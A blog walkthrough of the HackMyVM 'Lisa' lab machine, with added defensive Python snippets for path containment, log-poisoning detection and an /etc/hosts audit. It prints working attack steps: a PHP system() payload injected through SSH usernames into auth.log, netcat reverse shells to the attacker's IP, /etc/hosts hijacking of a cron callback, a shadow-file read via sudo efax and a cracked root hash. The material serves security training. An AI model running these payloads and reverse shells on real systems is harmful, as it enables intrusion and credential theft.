Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Lisa Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Lisa

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
 |   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
 |_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Directory scanning on port 80 finds nothing useful. Looking at index.html, there is a hint about the domain name vinci.hmv.

 ~ curl http://192.168.56.100/index.html |tail -n 15                                   
           <p>
                 Please report bugs specific to modules (such as PHP and others)
                 to respective packages, not to the web server itself. contact: vinci.hmv
           </p>
         </div>


Add vinci.hmv to /etc/hosts and scan port 80 again; still nothing useful.

Use gobuster to enumerate virtual hosts.

 ~ gobuster vhost -u vinci.hmv  -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
 ===============================================================
 ...
 Missed: secret.vinci.hmv (Status: 200) [Size: 80]
 ===============================================================
 2021/07/04 15:35:24 Finished
 ===============================================================


Add secret.vinci.hmv to /etc/hosts and brute-force files again; this time file.php turns up.

 ~ gobuster dir -u http://secret.vinci.hmv -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard -o 80_secret.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /file.php             (Status: 200) [Size: 0]


Fuzz the parameter name with wfuzz.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000004959:   200        26 L     42 W       1441 Ch     "command"  


Looks like an LFI (local file inclusion): file.php returns the contents of whatever path is passed in the command parameter.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
 ...
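
The bug behind file.php is that a client-supplied path is read with no containment at all. As an added example (the page does not show file.php's source, and this is not it), here is the pattern in Python: resolve the request against a fixed base directory (an assumed path) and refuse anything that escapes it, including absolute paths, traversal and symlinks.

```python
import os
import tempfile
from typing import Optional

# Directory the application is allowed to serve from (assumed for this example).
BASE_DIR = "/var/www/secret/files"


def resolve_safe_path(requested: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Map a client-supplied path onto base_dir; return None if it escapes.

    Absolute paths are refused outright; '..' segments and symlinks are caught
    by comparing the canonical (realpath) result with the canonical base.
    """
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def read_file_safely(requested: str, base_dir: str = BASE_DIR) -> Optional[bytes]:
    """The file.php equivalent with containment: None for anything outside base_dir."""
    path = resolve_safe_path(requested, base_dir)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed scenario: a base directory with one legitimate file and a
    symlink pointing outside it. Returns what each request would get back."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "files")
        os.makedirs(os.path.join(base, "reports"))
        with open(os.path.join(base, "reports", "q1.txt"), "w") as fh:
            fh.write("quarterly report\n")
        os.symlink("/etc/passwd", os.path.join(base, "link"))
        return {
            "legit": read_file_safely("reports/q1.txt", base),
            "absolute": read_file_safely("/etc/passwd", base),  # the page's request
            "traversal": read_file_safely("../../etc/passwd", base),
            "symlink": read_file_safely("link", base),
            "log": read_file_safely("/var/log/auth.log", base),
        }
```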


Check which files we can read.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0         
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************      
 ...
 000000188:   200        0 L      1 W        32032 Ch    "/var/log/faillog"
 000000173:   200        1364 L   16410 W    130186 Ch   "/var/log/auth.log"
 000000181:   200        2993 L   17879 W    202004 Ch   "/var/log/dpkg.log"
 000000220:   200        5 L      85 W       74873 Ch    "/var/log/wtmp"
 000000224:   200        0 L      1 W        1152 Ch     "/var/run/utmp"
 000000199:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"


auth.log records the username of every SSH login attempt, even failed ones, so we log in over SSH with a short PHP snippet as the username (log poisoning). The login fails, but the PHP is now stored in auth.log.

 ~ ssh '<?php system($_GET[c]);?>'@192.168.56.100    
 <?php system($_GET[c]);?>@192.168.56.100's password:
 Permission denied, please try again.                


Including auth.log through the LFI now executes that PHP, so we can run commands via the c parameter.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
 ...
 Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data) from 192.168.56.150 port 33632 ssh2
 ...
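
From the defender's side, a poisoned auth.log is easy to spot: sshd logs the attempted username verbatim, and no real account name contains PHP tags or shell syntax. The following detector is an added example, not part of the original post; the sample log lines are constructed (one of them is the line the page shows above).

```python
import re

# sshd logs the attempted username verbatim, which is what turns auth.log into
# a log-poisoning vector when a web app includes it (as file.php does here).
SSHD_FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>.*?) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)
# What a real account name can look like; anything else deserves a look.
SANE_USER = re.compile(r"^[A-Za-z_][A-Za-z0-9._-]{0,31}\$?$")
# Fragments that only appear when someone is injecting code, not logging in.
CODE_MARKERS = ("<?", "?>", "$_", "system(", "exec(", "`")


def classify_username(user: str):
    """Return a reason if `user` looks like a poisoning attempt, else None."""
    if any(marker in user for marker in CODE_MARKERS):
        return "code marker in username"
    if not SANE_USER.match(user):
        return "username outside POSIX charset"
    return None


def find_poisoning_attempts(lines):
    """Return (source_ip, username, reason) for each suspicious sshd failure."""
    hits = []
    for line in lines:
        match = SSHD_FAILED.search(line)
        if not match:
            continue
        reason = classify_username(match.group("user"))
        if reason:
            hits.append((match.group("ip"), match.group("user"), reason))
    return hits


# Constructed sample, not the box's real auth.log: an ordinary failed login,
# the poisoned username from the SSH attempt above, the line the page shows
# once the payload had been executed through the include, and a normal login.
SAMPLE_LOG = [
    "Jun 20 21:40:02 Lisa sshd[7801]: Failed password for invalid user admin from 192.168.56.150 port 33610 ssh2",
    "Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user <?php system($_GET[c]);?> from 192.168.56.150 port 33632 ssh2",
    "Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data) from 192.168.56.150 port 33632 ssh2",
    "Jun 20 21:57:10 Lisa sshd[7940]: Accepted publickey for leonardo from 192.168.56.150 port 33640 ssh2",
]
```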


Get a reverse shell.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 =====================================================================
 ~ nc -nlvp 1234                                        
 Ncat: Version 7.91 ( https://nmap.org/ncat )          
 Ncat: Listening on :::1234                            
 Ncat: Listening on 0.0.0.0:1234                        
 Ncat: Connection from 192.168.56.100.                  
 Ncat: Connection from 192.168.56.100:52344.            
 id                                                    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  
 


There is only one regular user, leonardo, and /opt/cron.sh belongs to him.

 www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
 /home/leonardo                                                
 /home/leonardo/.bash_logout                                    
 /home/leonardo/.profile                                        
 /home/leonardo/.bashrc                                        
 /home/leonardo/.local                                          
 /home/leonardo/.local/share                                    
 /home/leonardo/.selected_editor                                
 /home/leonardo/user.txt                                        
 /opt/cron.sh                                                  


Check cron.sh. It pings the hostname shelly.lisa.hmv and, if the host answers, opens a reverse shell to it on port 65000.

 www-data@Lisa:/opt$ cat cron.sh
 #!/bin/bash

 domain='shelly.lisa.hmv'

 function check(){

     timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
     if [ "$(echo $?)" == "0" ]; then
         nohup nc -e /bin/sh $domain 65000
         exit 0
     else
         exit 1
     fi
 }
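
What makes this job exploitable is the combination of a privileged script that trusts a hostname and an /etc/hosts that any local user can write. The audit below is an added example, not something from the page or the box: given the mode and contents of /etc/hosts (constructed inputs here), it reports both conditions for a given callback name.

```python
import stat
from typing import Dict, List, Optional


def world_writable(mode: int) -> bool:
    """True if the 'other' write bit is set, as in the -rw----rw- on this box."""
    return bool(mode & stat.S_IWOTH)


def parse_hosts(text: str) -> Dict[str, str]:
    """Map every hostname in /etc/hosts content to its address (first entry wins)."""
    mapping: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            mapping.setdefault(name, addr)
    return mapping


def audit_callback_host(hosts_mode: int, hosts_text: str, domain: str,
                        expected_addr: Optional[str] = None) -> List[str]:
    """Findings for a privileged job that connects back to `domain`.

    hosts_mode is the st_mode of /etc/hosts, hosts_text its contents, and
    expected_addr the address the operator intends the name to map to
    (None when the name should never be overridden locally).
    """
    findings = []
    if world_writable(hosts_mode):
        findings.append("/etc/hosts is world-writable: any local user can redirect names")
    resolved = parse_hosts(hosts_text).get(domain)
    if resolved is not None and resolved != expected_addr:
        findings.append(f"{domain} is pinned locally to {resolved}")
    return findings


# Constructed inputs: the state the walkthrough produces, and a sane baseline.
POISONED = (0o100606, "192.168.56.150 shelly.lisa.hmv\n")
BASELINE = (0o100644, "127.0.0.1 localhost\n127.0.1.1 Lisa\n")
```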


/etc/hosts is world-writable (mode -rw----rw-), so we can make shelly.lisa.hmv resolve to the attacker's machine. Note that the echo below overwrites the whole file rather than appending to it, which is why sudo later complains that it cannot resolve the host Lisa.

 www-data@Lisa:/opt$ ls -la /etc/hosts
 -rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
 www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts


After about a minute the cron job fires and we get a reverse shell as leonardo.

 ~ nc -nlvp 65000
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::65000
 Ncat: Listening on 0.0.0.0:65000
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49036.
 id
 uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


Write our id_rsa.pub into /home/leonardo/.ssh/authorized_keys, chmod it to 600, and we have SSH access.

 ~ ssh leonardo@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
 
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
 /usr/bin/xauth:  file /home/leonardo/.Xauthority does not exist
 leonardo@Lisa:~$
 


Check sudo -l.

 leonardo@Lisa:~$ sudo -l
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 Matching Defaults entries for leonardo on Lisa:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User leonardo may run the following commands on Lisa:
     (root) NOPASSWD: /usr/bin/efax


Use efax to read the shadow file. With -d, efax opens the given path as if it were the fax modem and warns about every line it does not recognise as a modem response, echoing the file's contents in the process.

 leonardo@Lisa:~$ sudo efax -d /etc/shadow
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
 efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
 efax: 10:17 compiled Dec 15 2016 12:12:26
 efax: 10:17 opened /etc/shadow
 efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
 efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
 efax: 10:17 Warning: unexpected response "daemon:*:18791:0:99999:7:::"
 efax: 10:17 Warning: unexpected response "bin:*:18791:0:99999:7:::"
 ...


Save root's hash to hash.txt and crack it with john.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt   
 Using default input encoding: UTF-8
 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 iloveme          (root)
 1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed


Finally, switch to root with the cracked password.

 leonardo@Lisa:~$ su root
 Contraseña:
 root@Lisa:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 Lisa

